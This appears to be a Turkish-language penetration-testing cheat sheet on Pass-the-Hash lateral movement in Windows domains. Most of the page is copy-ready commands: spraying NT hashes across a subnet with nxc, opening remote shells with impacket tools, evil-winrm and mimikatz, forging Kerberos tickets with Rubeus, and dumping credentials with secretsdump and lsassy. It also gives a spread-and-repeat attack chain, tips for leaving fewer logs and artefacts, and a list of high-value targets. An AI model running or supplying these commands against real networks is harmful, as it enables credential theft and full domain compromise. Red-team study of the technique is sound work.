Skip to content

Pass-the-Hash

MITRE ATT&CK · T1550.002 phase: lateral movement

MITRE ATT&CK · T1550.002 phase: lateral movement

Pass-the-Hash (PtH), NTLM kimlik doğrulamasında parolanın açık haline gerek olmamasından yararlanır: kullanıcının NT hash’i doğrudan challenge/response hesabında kullanılır. Hash kırılmadan, hash’in geçerli olduğu tüm sistemlere (domain veya local) erişilebilir.

- NT hash: LSASS, SAM, DCSync, NTDS, VSS secretsdump
- Hedefte NTLM kabul (Kerberos-only policy yok)
- Domain: hesap kilitli/disabled değil
- Local: aynı local admin hash (image reuse)
Format: -hashes :NTHASH veya -H :NTHASH

Pass-the-Hash · psexec

embedded tool
Generated command
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 domain.local/administrator@10.10.10.5
  1. Erişimi doğrula / spray hash :

    Terminal window
    nxc smb 10.10.10.0/24 -u Administrator -H :NTHASH
    Terminal window
    nxc smb 10.10.10.0/24 -u Administrator -H :NTHASH --local-auth
    Terminal window
    nxc smb 10.10.10.0/24 -u 'domain.local\admin' -H :NTHASH
  2. Komut çalıştır / shell :

    Terminal window
    impacket-psexec -hashes :NTHASH domain.local/Administrator@10.10.10.20
    Terminal window
    impacket-wmiexec -hashes :NTHASH domain.local/Administrator@10.10.10.20
    Terminal window
    impacket-smbexec -hashes :NTHASH domain.local/Administrator@10.10.10.20
    Terminal window
    impacket-atexec -hashes :NTHASH domain.local/Administrator@10.10.10.20 'whoami'
    Terminal window
    impacket-dcomexec -hashes :NTHASH domain.local/Administrator@10.10.10.20
    Terminal window
    evil-winrm -i 10.10.10.20 -u Administrator -H NTHASH
    Terminal window
    nxc smb 10.10.10.20 -u Administrator -H :NTHASH -x 'whoami /all'
    Terminal window
    nxc winrm 10.10.10.20 -u Administrator -H :NTHASH -x 'hostname'
  3. Yayıl — yeni host’ta LSASS / SAM / LAPS → yeni hash → tekrar 1.

sekurlsa::pth /user:Administrator /domain:domain.local /ntlm:NTHASH /run:cmd.exe
Terminal window
xfreerdp /u:Administrator /d:domain.local /pth:NTHASH /v:10.10.10.20

Over-Pass-the-Hash (hash → Kerberos TGT)

Section titled “Over-Pass-the-Hash (hash → Kerberos TGT)”
Terminal window
impacket-getTGT domain.local/Administrator -hashes :NTHASH
Terminal window
export KRB5CCNAME=Administrator.ccache
Terminal window
impacket-psexec -k -no-pass domain.local/Administrator@dc01.domain.local
Terminal window
Rubeus.exe asktgt /user:Administrator /rc4:NTHASH /ptt
Terminal window
Rubeus.exe asktgt /user:Administrator /aes256:AESKEY /ptt

NTLM kapalı segmentlerde kritik; Pass-the-Ticket dünyasına geçiş.

SenaryoBayrakNot
Domain account-u user -H :hashDC’ye authenticate
Local Administrator–local-authRID 500 reuse
Machine accountUSER$ + machine NTSilver daha uygun
□ Geniş /24 spray → 4624/4625; önce AdminTo daralt
□ wmiexec/smbexec genelde psexec’ten daha az servis artefaktı
□ Over-PtH ile Kerberos → NTLM log azalabilir
□ Öncelik: DC, CA, SCCM, backup
□ -hashes NT (baştaki : yok) → LM parse hatası
□ Local auth unutulunca domain’e gider
□ LAPS ile local admin adı farklı
□ NTLM disabled → Over-PtH
□ Protected Users → ticket gerekir
DCSync → Domain Admin NT
→ nxc smb /24 -H → Pwn3d listesi
→ wmiexec → LSASS on jump host
→ yeni hash → devam
Terminal window
nxc smb HOST -u user -H :HASH --local-auth -M lsassy
Terminal window
impacket-secretsdump -sam sam.save -system system.save LOCAL
Terminal window
impacket-secretsdump domain.local/da:'Pass'@DC -just-dc-ntlm
Terminal window
nxc ldap DC -u user -p pass -M get-desc-users # veya laps modülü

Exec methods · Pass-the-Ticket · LSASS Dumping